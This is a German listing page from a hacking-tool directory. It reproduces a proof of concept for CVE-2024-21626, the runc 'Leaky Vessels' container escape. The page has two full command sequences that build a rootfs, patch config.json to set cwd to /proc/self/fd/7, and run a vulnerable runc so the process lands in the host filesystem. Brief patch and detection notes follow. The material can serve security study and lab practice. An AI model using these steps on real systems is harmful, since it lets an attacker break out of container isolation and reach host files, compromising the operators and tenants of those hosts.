Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
cve-2024-21626-runc-1.1.11-escape — PoC für CVE-2024-21626: runc leakt vor pivot_root einen internen fd, der auf das CWD des Hosts verweist, und ermöglicht so einen Container-Escape, indem process.cwd auf /proc/self/fd/7 gesetzt wird. | Kitploit
Tools/GitHubGitHub/strikoder-premium/cve-2024-21626-runc-1.1.11-escape
Container-SicherheitSchwachstellenanalyseExploitationPenetrationstestsRed TeamingContainer-Ausbruch
GitHubstrikoder-premium/cve-2024-21626-runc-1.1.11-escape

cve-2024-21626-runc-1.1.11-escape

PoC für CVE-2024-21626: runc leakt vor pivot_root einen internen fd, der auf das CWD des Hosts verweist, und ermöglicht so einen Container-Escape, indem process.cwd auf /proc/self/fd/7 gesetzt wird.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
1vor 5 MonatenNoch nicht geprüft

CVE-2024-21626 - runc Leaky Vessels

Überblick

FeldDetail
CVECVE-2024-21626
Betroffene Komponenterunc ≤ 1.1.11
SchwachstellenklasseContainer-Ausbruch über Dateideskriptor-Leck
SpitznameLeaky Vessels

Grundursache

runc gibt vor der Ausführung des Container-Prozesses einen internen Dateideskriptor (typischerweise fd/7) frei, der auf das Arbeitsverzeichnis des Host-Dateisystems verweist. Wenn du in config.json das cwd des Containers auf /proc/self/fd/7 setzt, landet der Prozess in einem Host-Verzeichnis statt im Container-Rootfs – das ermöglicht einen Container-Ausbruch.


Ausnutzungsmethoden

Methode 1 - Manuelles Rootfs aus Host-Binaries

Erstelle ein minimales Rootfs, indem du Binaries direkt vom Host kopierst:

root@kitploit:~
# 1. Create directory structure
cd /tmp && mkdir -p strikoder/rootfs && cd strikoder
mkdir -p rootfs/lib64 rootfs/lib

# 2. Copy binaries and required libraries
cp -aL /bin rootfs/bin
cp /lib64/ld-linux-x86-64.so.2 rootfs/lib64/
cp -a /lib/x86_64-linux-gnu rootfs/lib

# 3. Generate default OCI config
runc spec

# 4. Patch cwd in config.json to point at leaked host fd
# Change: "cwd": "/"
# To:     "cwd": "/proc/self/fd/7"
vi config.json

# 5. Run the container with the vulnerable runc binary
sudo /opt/debug --log /tmp/log.json run strikontainer

Was passiert: runc öffnet fd/7, das auf das Host-CWD verweist, bevor der Wechsel (Pivot) zum Container-Rootfs erfolgt. Das Setzen von cwd auf /proc/self/fd/7 bewirkt, dass runc per chdir() in den Host-Pfad wechselt statt in den Container – du landest im echten Dateisystem.


Methode 2 - Alpine-Docker-Image als Rootfs

Falls du eine vollständigere Umgebung benötigst oder der Host nur begrenzte Binaries bereithält:

root@kitploit:~
# --- On your attack machine ---
# Export a minimal Alpine filesystem
docker export $(docker create alpine:latest) > alpine.tar

# Transfer alpine.tar to the target, then:

# --- On target ---
mkdir -p /tmp/strikoder/rootfs && cd /tmp/strikoder
tar -xvf /path/to/alpine.tar -C rootfs

# Generate OCI bundle config
runc spec

# Patch cwd (same as Method 1)
vi config.json
# "cwd": "/proc/self/fd/7"

# Run
sudo /opt/debug --log /tmp/log.json run strikontainer

Erkennung & Eindämmung

  • Patch: Aktualisiere runc auf ≥ 1.1.12 (oder ≥ 1.2.0-rc.2)
  • Erkennung: Überwache openat()-Aufrufe auf /proc/self/fd/ in Container-cwd-Konfigurationen; löse einen Alarm bei OCI-Bundles aus, deren cwd /proc/self/fd enthält
  • Eindämmung: Verwende seccomp-Profile, die den /proc-Zugriff einschränken; erwäge rootless Container oder gVisor/Kata für eine stärkere Isolierung

Referenzen

  • NVD: CVE-2024-21626
  • runc GitHub Security Advisory
  • Snyk Leaky Vessels Blog
  • HackTheBox - GiveBack-Maschine
Tool herunterladen